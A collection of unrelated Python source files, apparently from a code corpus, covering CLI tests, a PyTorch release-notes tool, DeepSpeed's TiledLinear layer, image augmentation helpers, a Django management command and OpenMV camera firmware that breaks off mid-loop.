method='PUT',
path='/group/org/grp/members/new_member',
status=204,
)
main(['--show-traceback', 'groups', 'add_member', 'org/grp/new_member'], False)
urls.assertAllCalled()
@urlpatch
def test_add_member_missing_member(self, urls):
with self.assertRaisesRegexp(errors.UserError, 'Member name not given'):
main(['--show-traceback', 'groups', 'add_member', 'org/grp'], False)
@urlpatch
def test_remove_member(self, urls):
urls.register(
method='DELETE',
path='/group/org/grp/members/new_member',
status=204,
)
main(['--show-traceback', 'groups', 'remove_member', 'org/grp/new_member'], False)
urls.assertAllCalled()
@urlpatch
def test_packages(self, urls):
urls.register(
method='GET',
path='/group/org/grp/packages',
content='[{"name": "pkg", "full_name": "org/pkg", "summary": "An org pkg"}]'
)
main(['--show-traceback', 'groups', 'packages', 'org/grp'], False)
urls.assertAllCalled()
@urlpatch
def test_add_package(self, urls):
urls.register(
method='PUT',
path='/group/org/grp/packages/pkg',
status=204,
)
main(['--show-traceback', 'groups', 'add_package', 'org/grp/pkg'], False)
urls.assertAllCalled()
@urlpatch
def test_remove_package(self, urls):
urls.register(
method='DELETE',
path='/group/org/grp/packages/pkg',
status=204,
)
main(['--show-traceback', 'groups', 'remove_package', 'org/grp/pkg'], False)
urls.assertAllCalled()
if __name__ == "__main__":
unittest.main()
|
413087
|
def ensureUtf(s, encoding='utf8'):
"""Converts input to unicode if necessary.
If `s` is bytes, it will be decoded using the `encoding` parameters.
This function is used for preprocessing /source/ and /filename/ arguments
to the builtin function `compile`.
"""
# In Python2, str == bytes.
# In Python3, bytes remains unchanged, but str means unicode
# while unicode is not defined anymore
if type(s) == bytes:
return s.decode(encoding, 'ignore')
else:
return s
|
413105
|
import time
from pyrunner import Worker
class SayHello(Worker):
def run(self):
self.logger.info('Hello World!')
return
class FailMe(Worker):
def run(self):
return 1
|
413144
|
import gobject
import numpy as np
import matplotlib
matplotlib.use('GTKAgg')
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
line, = ax.plot(np.random.rand(10))
ax.set_ylim(0, 1)
def update():
line.set_ydata(np.random.rand(10))
fig.canvas.draw_idle()
return True # return False to terminate the updates
gobject.timeout_add(100, update) # you can also use idle_add to update when gtk is idle
plt.show()
|
413165
|
import argparse
from common import run, topics
from collections import defaultdict
import os
import csv
import pprint
from common import CommitDataCache
import re
"""
Example Usages
Create a new commitlist for consumption by categorize.py.
Said commitlist contains commits between v1.5.0 and f5bc91f851.
python commitlist.py --create_new tags/v1.5.0 f5bc91f851
Update the existing commitlist to commit bfcb687b9c.
python commitlist.py --update_to bfcb687b9c
"""
class Commit:
def __init__(self, commit_hash, category, topic, title):
self.commit_hash = commit_hash
self.category = category
self.topic = topic
self.title = title
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.commit_hash == other.commit_hash and \
self.category == other.category and \
self.topic == other.topic and \
self.title == other.title
def __repr__(self):
return f'Commit({self.commit_hash}, {self.category}, {self.topic}, {self.title})'
class CommitList:
# NB: Private ctor. Use `from_existing` or `create_new`.
def __init__(self, path, commits):
self.path = path
self.commits = commits
@staticmethod
def from_existing(path):
commits = CommitList.read_from_disk(path)
return CommitList(path, commits)
@staticmethod
def create_new(path, base_version, new_version):
if os.path.exists(path):
raise ValueError('Attempted to create a new commitlist but one exists already!')
commits = CommitList.get_commits_between(base_version, new_version)
return CommitList(path, commits)
@staticmethod
def read_from_disk(path):
with open(path) as csvfile:
reader = csv.reader(csvfile)
rows = list(row for row in reader)
assert all(len(row) >= 4 for row in rows)
return [Commit(*row[:4]) for row in rows]
def write_to_disk(self):
path = self.path
rows = self.commits
with open(path, 'w') as csvfile:
writer = csv.writer(csvfile)
for commit in rows:
writer.writerow([commit.commit_hash, commit.category, commit.topic, commit.title])
@staticmethod
def get_commits_between(base_version, new_version):
cmd = f'git merge-base {base_version} {new_version}'
rc, merge_base, _ = run(cmd)
assert rc == 0
# Returns a list of something like
# b33e38ec47 Allow a higher-precision step type for Vec256::arange (#34555)
cmd = f'git log --reverse --oneline {merge_base}..{new_version}'
rc, commits, _ = run(cmd)
assert rc == 0
log_lines = commits.split('\n')
hashes, titles = zip(*[log_line.split(' ', 1) for log_line in log_lines])
return [Commit(commit_hash, 'Uncategorized', 'Untopiced', title) for commit_hash, title in zip(hashes, titles)]
def filter(self, *, category=None, topic=None):
commits = self.commits
if category is not None:
commits = [commit for commit in commits if commit.category == category]
if topic is not None:
commits = [commit for commit in commits if commit.topic == topic]
return commits
def update_to(self, new_version):
last_hash = self.commits[-1].commit_hash
new_commits = CommitList.get_commits_between(last_hash, new_version)
self.commits += new_commits
def stat(self):
counts = defaultdict(lambda: defaultdict(int))
for commit in self.commits:
counts[commit.category][commit.topic] += 1
return counts
def create_new(path, base_version, new_version):
commits = CommitList.create_new(path, base_version, new_version)
commits.write_to_disk()
def update_existing(path, new_version):
commits = CommitList.from_existing(path)
commits.update_to(new_version)
commits.write_to_disk()
def to_markdown(commit_list, category):
def cleanup_title(commit):
match = re.match(r'(.*) \(#\d+\)', commit.title)
if match is None:
return commit.title
return match.group(1)
cdc = CommitDataCache()
lines = [f'\n## {category}\n']
for topic in topics:
lines.append(f'### {topic}\n')
commits = commit_list.filter(category=category, topic=topic)
for commit in commits:
result = cleanup_title(commit)
maybe_pr_number = cdc.get(commit.commit_hash).pr_number
if maybe_pr_number is None:
result = f'- {result} ({commit.commit_hash})\n'
else:
result = f'- {result} ([#{maybe_pr_number}](https://github.com/pytorch/pytorch/pull/{maybe_pr_number}))\n'
lines.append(result)
return lines
def get_markdown_header(category):
header = f"""
# Release Notes worksheet {category}
The main goal of this process is to rephrase all the commit messages below to make them clear and easy to read by the end user. You should follow the following instructions to do so:
* **Please cleanup, and format commit titles to be readable by the general pytorch user.** [Detailed intructions here](https://fb.quip.com/OCRoAbEvrRD9#HdaACARZZvo)
* Please sort commits into the following categories (you should not rename the categories!), I tried to pre-sort these to ease your work, feel free to move commits around if the current categorization is not good.
* Please drop any commits that are not user-facing.
* If anything is from another domain, leave it in the UNTOPICED section at the end and I'll come and take care of it.
The categories below are as follows:
* BC breaking: All commits that are BC-breaking. These are the most important commits. If any pre-sorted commit is actually BC-breaking, do move it to this section. Each commit should contain a paragraph explaining the rational behind the change as well as an example for how to update user code (guidelines here: https://quip.com/OCRoAbEvrRD9)
* Deprecations: All commits introducing deprecation. Each commit should include a small example explaining what should be done to update user code.
* new_features: All commits introducing a new feature (new functions, new submodule, new supported platform etc)
* improvements: All commits providing improvements to existing feature should be here (new backend for a function, new argument, better numerical stability)
* bug fixes: All commits that fix bugs and behaviors that do not match the documentation
* performance: All commits that are added mainly for performance (we separate this from improvements above to make it easier for users to look for it)
* documentation: All commits that add/update documentation
* Developers: All commits that are not end-user facing but still impact people that compile from source, develop into pytorch, extend pytorch, etc
"""
return [header,]
def main():
parser = argparse.ArgumentParser(description='Tool to create a commit list')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('--create_new', nargs=2)
group.add_argument('--update_to')
group.add_argument('--stat', action='store_true')
group.add_argument('--export_markdown', action='store_true')
parser.add_argument('--path', default='results/commitlist.csv')
args = parser.parse_args()
if args.create_new:
create_new(args.path, args.create_new[0], args.create_new[1])
return
if args.update_to:
update_existing(args.path, args.update_to)
return
if args.stat:
commits = CommitList.from_existing(args.path)
stats = commits.stat()
pprint.pprint(stats)
return
if args.export_markdown:
commits = CommitList.from_existing(args.path)
categories = list(commits.stat().keys())
for category in categories:
print(f"Exporting {category}...")
lines = get_markdown_header(category)
lines += to_markdown(commits, category)
filename = f'results/export/result_{category}.md'
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, 'w') as f:
f.writelines(lines)
return
assert False
if __name__ == '__main__':
main()
|
413167
|
import torch
import deepspeed
from deepspeed.runtime.utils import partition_uniform as partition
def split_tensor_along_last_dim(tensor, partitions, contiguous_split_chunks=False):
"""Split a tensor along its last dimension. Adapted from Megatron-LM.
Arguments:
tensor: input tensor.
partitions: list of partition sizes to supply to torch.split
contiguous_split_chunks: If True, make each chunk contiguous
in memory.
"""
# Get the size and dimension.
last_dim = tensor.dim() - 1
# Split.
tensor_list = torch.split(tensor, partitions, dim=last_dim)
# Note: torch.split does not create contiguous tensors by default.
if contiguous_split_chunks:
return tuple(chunk.contiguous() for chunk in tensor_list)
return tensor_list
class TiledLinear(torch.nn.Module):
def __init__(self,
in_features,
out_features,
bias=True,
in_splits=1,
out_splits=1,
input_is_already_split=False,
combine_out_splits=True,
linear_cls=torch.nn.Linear,
init_linear=None,
**kwargs):
"""A replacement for ``torch.nn.Linear`` that works with ZeRO-3 to reduce
memory requirements via tiling.
TiledLinear breaks the input and output dimensions of a linear layer
into tiles that are processed in sequence. This class enables huge
linear layers when combined with ZeRO-3 because inactive tiles can be
partitioned and offloaded.
.. note::
We recommend using as few tiles as necessary. Tiling
significantly reduces memory usage, but can reduce throughput
for inexpensive layers. This due to the smaller kernels having
less parallelism and lower arithmetic intensity, while
introducing more frequent synchronization and communication.
Args:
in_features (int): See ``torch.nn.Linear``
out_features (int): See ``torch.nn.Linear``
bias (bool, optional): See ``torch.nn.Linear``
in_splits (int, optional): The number of tiles along the input dimension. Defaults to 1.
out_splits (int, optional): The number of tiles along the output dimension. Defaults to 1.
input_is_already_split (bool, optional): If set to ``True``, assume that the ``input_`` in
to ``forward()`` is already split into ``in_splits`` chunks. Defaults to ``False``.
combine_out_splits (bool, optional): If set to ``False``, do not combine the ``out_splits`` outputs
into a single tensor. Defaults to ``True``.
linear_cls (class, optional): The underlying class to build individual tiles.
Defaults to ``torch.nn.Linear``.
init_linear (``torch.nn.Linear``, optional): If set, copy the parameters of
``init_linear``. Useful for debugging. Defaults to ``None``.
kwargs (dict, optional): additional keyword arguments to provide to ``linear_cls()``.
Raises:
RuntimeError: ``in_splits`` must be within the range [1, in_features).
RuntimeError: ``out_splits`` must be within the range of [1, out_features).
"""
super().__init__()
if (in_splits < 1) or (in_splits > in_features):
raise RuntimeError('in splits must be in range [1, in_features].')
if (out_splits < 1) or (out_splits > out_features):
raise RuntimeError('out splits must be in range [1, out_features].')
# global, not necessarily local
self.in_features = in_features
self.out_features = out_features
self.use_bias = bias
self.out_splits = out_splits
self.in_splits = in_splits
self.input_is_already_split = input_is_already_split
self.combine_out_splits = combine_out_splits
# Build partition-lists. These are CSR-style splits [0, part0, part1, ..., features]
# For example, row_parts[p] gives the start of partition p and row_parts[p+1]
# is the exclusive end.
self.in_parts = partition(num_items=in_features, num_parts=in_splits)
self.out_parts = partition(num_items=out_features, num_parts=out_splits)
assert len(self.out_parts) == out_splits + 1
assert len(self.in_parts) == in_splits + 1
assert self.out_parts[0] == 0
assert self.out_parts[out_splits] == out_features
assert self.in_parts[in_splits] == in_features
self.linears = torch.nn.ModuleList()
for out_id in range(out_splits):
self.linears.append(torch.nn.ModuleList())
local_out_dim = self.out_parts[out_id + 1] - self.out_parts[out_id]
for in_id in range(in_splits):
#if input_size is split, we only need one bias
local_bias = bias if in_id == (in_splits - 1) else False
local_in_dim = self.in_parts[in_id + 1] - self.in_parts[in_id]
local = linear_cls(local_in_dim,
local_out_dim,
bias=local_bias,
**kwargs)
self.linears[out_id].append(local)
# Optionally initialize with a known tensor
if init_linear is not None:
self.copy_params_from(init_linear)
def forward(self, input_):
if self.in_splits > 1 and not self.input_is_already_split:
split_sizes = [
self.in_parts[p + 1] - self.in_parts[p] for p in range(self.in_splits)
]
inputs = self._split_global_input(input_, split_sizes)
elif self.in_splits > 1:
inputs = input_
assert len(inputs) == self.in_splits, f"Col splits {self.in_splits} does not match input splits {len(inputs)}"
else:
# no splits
inputs = [input_]
outputs = [None] * self.out_splits
for out_id in range(self.out_splits):
for in_id in range(self.in_splits):
local_output = self.linears[out_id][in_id](inputs[in_id])
outputs[out_id] = self._reduce_local_output(in_id=in_id,
out_id=out_id,
current_out=outputs[out_id],
new_out=local_output)
if self.combine_out_splits:
return self._combine_output_splits(outputs)
return outputs
def _split_global_input(self, input, split_sizes):
"""Partition an input tensor along the last dimension, aligned with given splits.
Subclasses should override this method to account for new input types.
Args:
input (List[Tensor]): The tensor to partition along the last dimension.
split_sizes (List[int]): The size of each partition.
Returns:
List[Any]: A list of the chunks of ``input``.
"""
return split_tensor_along_last_dim(input, split_sizes)
def _reduce_local_output(self, in_id, out_id, current_out, new_out):
"""Reduce (sum) a new local result into the existing local results.
Subclasses should override this method.
For a given ``out_id``, this method is called ``in_id-1`` times. The first input
split is a simple assignment.
Args:
in_id (int): The input split that produced ``new_out``.
out_id (int): The output split that produced ``new_out``.
current_out (Any): The reduced form of all previous ``out_id`` results.
new_out (Any): The local result from forward (``in_id``, ``out_id``)e
Returns:
Any: The combined result of ``current_out`` and ``new_out``.
"""
if current_out is None:
#this clone is necessary to preserve auto grad
#there is some issue with inplace update for outputs that are views
return new_out.clone()
else:
return current_out + new_out
def _combine_output_splits(self, outputs):
"""Join the splits of the output into a single result.
Args:
outputs (List[Any]): The reduced outputs for each output split.
Returns:
Any: The combined outputs.
"""
assert len(outputs) == self.out_splits
return torch.cat(outputs, dim=-1)
@torch.no_grad()
def copy_params_from(self, other):
"""Copy the weight and bias data from ``other``.
This is especially useful for reproducible initialization and testing.
Equivalent to:
.. code-block:: python
with torch.no_grad():
self.weight.copy_(other.weight)
if self.bias is not None:
self.bias.copy_(other.bias)
.. note::
If ZeRO-3 is enabled, this is a collective operation and the
updated parameters of data-parallel rank 0 will be visible on all
ranks. See :class:`deepspeed.zero.GatheredParameters` for more
information.
Args:
other (``torch.nn.Linear``): the linear layer to copy from.
"""
assert hasattr(other, 'weight')
assert other.weight.size() == (self.out_features, self.in_features)
if self.use_bias:
assert hasattr(other, 'bias')
assert other.bias is not None
assert other.bias.size() == (self.out_features, )
else:
assert other.bias is None
for row in range(self.out_splits):
rstart = self.out_parts[row]
rstop = self.out_parts[row + 1]
for col in range(self.in_splits):
cstart = self.in_parts[col]
cstop = self.in_parts[col + 1]
local = self.linears[row][col]
global_weight = other.weight[rstart:rstop, cstart:cstop]
with deepspeed.zero.GatheredParameters(local.weight, modifier_rank=0):
local.weight.copy_(global_weight)
if local.bias is not None:
with deepspeed.zero.GatheredParameters(local.bias, modifier_rank=0):
local.bias.data.copy_(other.bias[rstart:rstop].data)
class TiledLinearReturnBias(TiledLinear):
"""Wrapper for a Linear class that returns its own bias parameter, such as
used by Megatron-LM.
"""
def _reduce_local_output(self, in_id, out_id, current_out, new_out):
"""Reduces output tensors, but not the returned bias. """
if current_out is not None:
old_tensor, old_bias = current_out
else:
old_tensor, old_bias = None, None
assert isinstance(new_out, tuple)
assert len(new_out) == 2
tensor, bias = new_out
assert tensor is not None
tensor = super()._reduce_local_output(in_id=in_id,
out_id=out_id,
current_out=old_tensor,
new_out=tensor)
if bias is None:
bias = old_bias
return tensor, bias
def _combine_output_splits(self, outputs):
# stack output tensors
tensors = [o[0] for o in outputs]
tensor = super()._combine_output_splits(tensors)
# stack biases if applicable
biases = [o[1] for o in outputs if o[1] is not None]
if len(biases) > 0:
bias = super()._combine_output_splits(biases)
else:
bias = None
return tensor, bias
|
413192
|
import sublime
import sublime_plugin
from .. import utils
class CfmlNavigateToMethodCommand(sublime_plugin.WindowCommand):
def run(self, file_path, href):
if len(file_path) > 0:
index_locations = self.window.lookup_symbol_in_index(href)
for full_path, project_path, rowcol in index_locations:
if utils.format_lookup_file_path(full_path) == file_path:
row, col = rowcol
self.window.open_file(full_path + ":" + str(row) + ":" + str(col), sublime.ENCODED_POSITION | sublime.FORCE_GROUP)
break
else:
# might be a setter, so for now just open the file
self.window.open_file(file_path)
else:
# this symbol should be in active view
view = self.window.active_view()
functions = view.find_by_selector("meta.function.declaration.cfml entity.name.function.cfml")
for funct_region in functions:
if view.substr(funct_region).lower() == href.lower():
view.sel().clear()
r = sublime.Region(funct_region.begin())
view.sel().add(r)
view.show(r)
break
|
413200
|
class NullLogger:
level_name = None
def remove(self, handler_id=None): # pragma: no cover
pass
def add(self, sink, **kwargs): # pragma: no cover
pass
def disable(self, name): # pragma: no cover
pass
def enable(self, name): # pragma: no cover
pass
def critical(self, __message, *args, **kwargs): # pragma: no cover
pass
def debug(self, __message, *args, **kwargs): # pragma: no cover
pass
def error(self, __message, *args, **kwargs): # pragma: no cover
pass
def exception(self, __message, *args, **kwargs): # pragma: no cover
pass
def info(self, __message, *args, **kwargs): # pragma: no cover
pass
def log(self, __level, __message, *args, **kwargs): # pragma: no cover
pass
def success(self, __message, *args, **kwargs): # pragma: no cover
pass
def trace(self, __message, *args, **kwargs): # pragma: no cover
pass
def warning(self, __message, *args, **kwargs): # pragma: no cover
pass
|
413205
|
import csv, json
def jsonFromCsv(csvFilePath, jsonFilePath):
# JSON objects
jsonData = {}
trialNums = {}
aimingLandmarks = {}
onlineFB = {}
endpointFB = {}
rotation = {}
clampedFB = {}
tgtDistance = {}
anglesDict = {}
betweenBlocks = {}
targetJump = {}
file = open(csvFilePath, 'r')
reader = csv.reader(file)
headings = next(reader) # Ensures we don't read the headings again
rowCount = 0
for row in reader:
trialNums[rowCount] = int(row[0])
aimingLandmarks[rowCount] = int(row[1])
anglesDict[rowCount] = int(row[2])
rotation[rowCount] = float(row[3])
onlineFB[rowCount] = int(row[4])
endpointFB[rowCount] = int(row[5])
clampedFB[rowCount] = float(row[6])
tgtDistance[rowCount] = int(row[7])
betweenBlocks[rowCount] = float(row[8])
targetJump[rowCount] = float(row[9])
rowCount += 1
file.close()
jsonData["numtrials"] = rowCount
jsonData["trialnum"] = trialNums
jsonData["aiming_landmarks"] = aimingLandmarks
jsonData["online_fb"] = onlineFB
jsonData["endpoint_feedback"] = endpointFB
jsonData["rotation"] = rotation
jsonData["clamped_fb"] = clampedFB
jsonData["tgt_angle"] = anglesDict
jsonData["tgt_distance"] = tgtDistance
jsonData["between_blocks"] = betweenBlocks
jsonData["target_jump"] = targetJump
for key in jsonData.keys():
print ("key: ", key)
print ("value: ", jsonData[key])
print ("")
with open(jsonFilePath, 'w') as outfile:
json.dump(jsonData, outfile)
"""
Please reference 'tbt_tgtfile_04272020_V2.csv' for how csv files should be formatted.
"""
csvFilePath = '../csv_tgt_files/multiclamp_demo_csv_file.csv'
jsonFilePath = '../public/tgt_files/multiclamp_demo.json'
jsonFromCsv(csvFilePath, jsonFilePath)
|
413215
|
from django.core.management.base import BaseCommand
from django.db.models import Q
from clubs.models import Club
class Command(BaseCommand):
help = (
"Set emails for all active clubs that do not have an email set. "
"Mark newly set emails as private. "
"Use the officer email if it exists."
)
def handle(self, *args, **kwargs):
for club in Club.objects.filter(
Q(active=True) & (Q(email="") | Q(email__isnull=True))
):
mship = (
club.membership_set.filter(~Q(person__email=""))
.order_by("role", "created_at")
.first()
)
if mship is not None:
email = mship.person.email
club.email = email
club.email_public = False
club._change_reason = "Add email to contact field"
club.save(update_fields=["email", "email_public"])
self.stdout.write(f"Added email {email} to {club.name}!")
else:
self.stdout.write(f"Could not add email to {club.name}!")
|
413225
|
import cv2
import numpy as np
from IPython.core.debugger import Tracer; keyboard = Tracer()
from scipy.interpolate import UnivariateSpline
def create_LUT_8UC1(x, y):
spl = UnivariateSpline(x, y,k=2)
return spl(xrange(256))
def _get_images_from_batches(batch):
batch_size = batch.shape[0]
img_width = batch.shape[1]
img_height = batch.shape[2]
img_channel = batch.shape[3]
imgs = np.split(batch,batch_size)
reshaped_imgs = []
for img in imgs:
img = img.reshape(img_width,img_height,img_channel)
reshaped_imgs.append(img)
return reshaped_imgs,img_width,img_height,img_channel
def trans2uint(batch):
batch = np.interp(batch,[0,1],[0,255])
batch = np.ndarray.astype(batch,'uint8')
return batch
def trans2float(batch):
batch = np.interp(batch,[0,255],[0,1])
batch = np.ndarray.astype(batch,'float64')
return batch
def add_noise_batch(batch,level):
noiselevel = np.sqrt(level)
gaussian_noise = np.random.normal(0,noiselevel,size = np.shape(batch))
noisy_batch = batch+gaussian_noise
noisy_batch = np.clip(noisy_batch,0.0,1.0)
return noisy_batch
def adjust_gamma_batch(batch,gammalevel=(1,3)):
imgs,_,_,_ = _get_images_from_batches(batch)
gammaed_imgs=[]
for img in imgs:
gamma = np.random.uniform(gammalevel[0],gammalevel[1])
gammaed_imgs.append(_adjusting_gamma(img,gamma))
batch = np.array(gammaed_imgs)
return batch
def apply_blur_batch(batch,kernelmax):
imgs,_,_,_ = _get_images_from_batches(batch)
blur_imgs = []
for img in imgs:
kernel = np.random.randint(int(kernelmax))
if kernel == 0:
blur_imgs.append(img)
else:
blur_imgs.append(_apply_blur(img,kernel))
batch = np.array(blur_imgs)
return batch
def adjust_saturation_batch(batch,valuelevel=0.2):
imgs,_,_,_ = _get_images_from_batches(batch)
saturated_imgs = []
for img in imgs:
value = np.random.uniform((1/(1+valuelevel)),1+valuelevel)
saturated_imgs.append(_adjusting_saturation(img,value))
batch = np.array(saturated_imgs)
return batch
def adjust_exposure_batch(batch,valuelevel=0.2):
imgs,_,_,_ = _get_images_from_batches(batch)
exposure_imgs = []
for img in imgs:
value = np.random.uniform((1/(1+valuelevel)),1+valuelevel)
exposure_imgs.append(_adjusting_exposure(img,value))
batch = np.array(exposure_imgs)
return batch
def apply_filter_batch(batch):
batch = trans2uint(batch)
imgs,_,_,_ = _get_images_from_batches(batch)
filted_img=[]
for img in imgs:
option = np.random.randint(2)
if option == 0:
filted_img.append(img)
elif option == 1:
filted_img.append(_apply_filter(img_bgr_in,"warming"))
elif option == 2:
filted_img.append(_apply_filter(img_bgr_in,"cold"))
batch = np.array(filted_img)
return batch
def _adjusting_gamma(image,gamma):
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
gammaed_image = cv2.LUT(image, table)
#apply gamma correction using the lookup table
return gammaed_image
def _apply_shifting(img,x,y):
rows,cols,chs = img.shape
M = np.float32([[1,0,x],[0,1,y]])
dst = cv2.warpAffine(img,M,(cols,rows))
return dst
def _apply_blur(img,kernellevel):
img_blur = cv2.blur(img,(kernellevel,kernellevel))
return img_blur
def _apply_filter(img_bgr_in,filter):
img_gray = cv2.cvtColor(img_rgb_in, cv2.COLOR_RGB2GRAY)
anchor_x = [0, 128, 255]
anchor_y = [0, 192, 255]
myLUT = create_LUT_8UC1(anchor_x, anchor_y)
img_curved = cv2.LUT(img_gray, myLUT).astype(np.uint8)
incr_ch_lut = create_LUT_8UC1([0, 64, 128, 192, 256],
[0, 70, 140, 210, 256])
decr_ch_lut = create_LUT_8UC1([0, 64, 128, 192, 256],
[0, 30, 80, 120, 192])
if filter == "warming":
c_b, c_g, c_r = cv2.split(img_bgr_in)
c_r = cv2.LUT(c_r, incr_ch_lut).astype(np.uint8)
c_b = cv2.LUT(c_b, decr_ch_lut).astype(np.uint8)
img_bgr_warm = cv2.merge((c_b, c_g, c_r))
c_b = cv2.LUT(c_b, decr_ch_lut).astype(np.uint8)
# increase color saturation
c_h, c_s, c_v = cv2.split(cv2.cvtColor(img_bgr_warm,
cv2.COLOR_BGR2HSV))
c_s = cv2.LUT(c_s, incr_ch_lut).astype(np.uint8)
img_bgr_warm = cv2.cvtColor(cv2.merge(
(c_h, c_s, c_v)),
cv2.COLOR_HSV2BGR)
return img_bgr_warm
elif filter == "cold":
c_b, c_g, c_r = cv2.split(img_bgr_in)
c_r = cv2.LUT(c_r, decr_ch_lut).astype(np.uint8)
c_b = cv2.LUT(c_b, incr_ch_lut).astype(np.uint8)
img_bgr_cold = cv2.merge((c_b, c_g, c_r))
# decrease color saturation
c_h, c_s, c_v = cv2.split(cv2.cvtColor(img_bgr_cold,
cv2.COLOR_BGR2HSV))
c_s = cv2.LUT(c_s, decr_ch_lut).astype(np.uint8)
img_bgr_cold = cv2.cvtColor(cv2.merge(
(c_h, c_s, c_v)),
cv2.COLOR_HSV2BGR)
return img_bgr_cold
def _adjusting_saturation(img,value):
hsv = cv2.cvtColor(img,cv2.COLOR_RGB2HSV)
hsv = hsv.astype(np.float64)
hsv[:,:,1] = hsv[:,:,1]*value
hsv[:,:,1] = np.clip(hsv[:,:,1],0.0,255.0)
hsv = hsv.astype(np.uint8)
image = cv2.cvtColor(hsv,cv2.COLOR_HSV2RGB)
return image
def _adjusting_exposure(img,value):
hsv = cv2.cvtColor(img,cv2.COLOR_RGB2HSV)
hsv = hsv.astype(np.float64)
hsv[:,:,2] = hsv[:,:,2]*value
hsv[:,:,2] = np.clip(hsv[:,:,2],0.0,255.0)
hsv = hsv.astype(np.uint8)
image = cv2.cvtColor(hsv,cv2.COLOR_HSV2RGB)
return image
def apply_flip_x(img):
return cv2.flip(img, 0)
def apply_flip_y(img):
return cv2.flip(img, 1)
def apply_flip_xy(img):
return cv2.flip(img, -1)
def apply_resize(img):
LinerImg = cv2.resize(img, size, interpolation = cv2.INTER_LINER)
return LinerImg
|
413231
|
import typer
from .. import settings
from typing import Optional
# Program
program = typer.Typer()
# Helpers
def version(value: bool):
if value:
typer.echo(settings.VERSION)
raise typer.Exit()
# Command
@program.callback()
def program_main(
version: Optional[bool] = typer.Option(None, "--version", callback=version)
):
"""Livemark is a Python static site generator
that extends Markdown with interactive charts, tables, scripts, and other features.
"""
pass
|
413232
|
import os
import pytest
import numpy as np
import trackintel as ti
from trackintel.visualization.util import a4_figsize
class TestA4_figsize:
"""Tests for a4_figsize() method."""
def test_parameter(self, caplog):
"""Test different parameter configurations."""
fig_width, fig_height = a4_figsize(columns=1)
assert np.allclose([3.30708661, 2.04389193], [fig_width, fig_height])
fig_width, fig_height = a4_figsize(columns=1.5)
assert np.allclose([5.07874015, 3.13883403], [fig_width, fig_height])
fig_width, fig_height = a4_figsize(columns=2)
assert np.allclose([6.85039370, 4.23377614], [fig_width, fig_height])
with pytest.raises(ValueError):
a4_figsize(columns=3)
a4_figsize(fig_height_mm=250)
assert "fig_height too large" in caplog.text
|
413265
|
import image, network, rpc, sensor, struct
import time
import micropython
from pyb import Pin
from pyb import LED
# variables that can be changed
save_to_SD = False
# leds are used as an easy way to know if the remote camera has started fine
red_led = LED(1)
green_led = LED(2)
blue_led = LED(3)
ir_led = LED(4)
def led_control(x):
if (x&1)==0: red_led.off()
elif (x&1)==1: red_led.on()
if (x&2)==0: green_led.off()
elif (x&2)==2: green_led.on()
if (x&4)==0: blue_led.off()
elif (x&4)==4: blue_led.on()
if (x&8)==0: ir_led.off()
elif (x&8)==8: ir_led.on()
processing = True
# pin to trigger the snapshot
pin4 = Pin('P4', Pin.IN, Pin.PULL_UP)
# communication with the controller cam
interface = rpc.rpc_spi_slave(cs_pin="P3", clk_polarity=1, clk_phase=0)
# here we always choose the QQVGA format (160x120) inside a QVGA image
#if this is changed, the camera have to calibrated again
# also, the logic of mask_height should be checked
img_width = 160
img_height = 120
sensor_format = sensor.RGB565
#additionnal data for the mask height
mask_height = 0
if sensor_format == sensor.RGB565:
mask_height = int(img_height /8)
else:
mask_height = int(img_height / 4)
if mask_height & 1:
mask_height += 1
sensor.reset()
sensor_size = sensor.QVGA
sensor.set_pixformat(sensor_format)
sensor.set_framesize(sensor_size)
# Note that there is a -2 compared to QVGA as there looks to be a little misalignement when moving from QVGA to QQQVGA
# As we use the same remap arrays for both definitions, it is important that both are aligned
sensor.set_windowing((int((sensor.width()-img_width)/2)-2,int((sensor.height()-img_height)/2),img_width,img_height))
#get the gains and exposure
gain_db = sensor.get_gain_db()
exposure_us = sensor.get_exposure_us()
rgb_gain_db = sensor.get_rgb_gain_db()
# Set the gain and exposure to fixed values (we dont care about the values)
sensor.set_auto_gain(False, gain_db)
sensor.set_auto_exposure(False, exposure_us)
sensor.set_auto_whitebal(False, rgb_gain_db)
# Setup contrast, brightness and saturation
sensor.set_contrast(0) # range -3 to +3
sensor.set_brightness(0) # range -3 to +3
sensor.set_saturation(0) # range -3 to +3
# Disable night mode (auto frame rate) and black level calibration (BLC)
sensor.__write_reg(0x0E, 0b00000000) # Disable night mode
sensor.__write_reg(0x3E, 0b00000000) # Disable BLC
sensor.__write_reg(0x13, 0b00000000) # disable automated gain
################################################################
# Call Backs
################################################################
def sensor_config(data):
global processing
sensor_regs= struct.unpack("<16I", data)
reg_list = [0x00, 0x01, 0x02, 0x03, 0x08, 0x10, 0x2d, 0x2e, 0x2f, 0x33, 0x34, 0x35, 0x36, 0x37, 0x37, 0x38]
i = 0
for sr in sensor_regs:
sensor.__write_reg(reg_list[i], sr)
i += 1
gain_db = sensor.get_gain_db()
exposure_us = sensor.get_exposure_us()
rgb_gain_db = sensor.get_rgb_gain_db()
processing = False
return struct.pack("<fIfff",gain_db, exposure_us, rgb_gain_db[0], rgb_gain_db[1], rgb_gain_db[2])
def raw_image_read_cb():
global processing
interface.put_bytes(sensor.get_fb().bytearray(), 5000) # timeout
processing = False
def raw_image_read(data):
interface.schedule_callback(raw_image_read_cb)
return bytes()
def loop_callback():
global processing
if not processing:
raise Exception
# Register call backs.
interface.register_callback(raw_image_read)
interface.register_callback(sensor_config)
interface.setup_loop_callback(loop_callback)
# a simple visual way to know the slave cam has started properly and is ready
# 2 blue blinks
led_control(4)
time.sleep(500)
led_control(0)
time.sleep(500)
led_control(4)
time.sleep(500)
led_control(0)
# configuration step
try:
processing = True
interface.loop()
except:
pass
#stabilisation of the cam
sensor.skip_frames(time=2000)
# save the ref image used for the diff
data_fb = sensor.alloc_extra_fb(img_width, img_height, sensor.RGB565)
ref_img = sensor.alloc_extra_fb(img_width, img_height, sensor_format)
img = sensor.snapshot()
img.remap(data_fb, right=True, upside_down=True)
ref_img.replace(img)
# now add an additional part that will convey the mask info
sensor.set_windowing((int((sensor.width()-img_width)/2)-2,int((sensor.height()-img_height)/2),img_width,img_height+ mask_height))
# serve for ever
while True:
try:
processing = True
while not pin4.value():
pass
# get the image and undistort it
sent_image = sensor.snapshot()
# remove the distortion and apply the stereo calibration
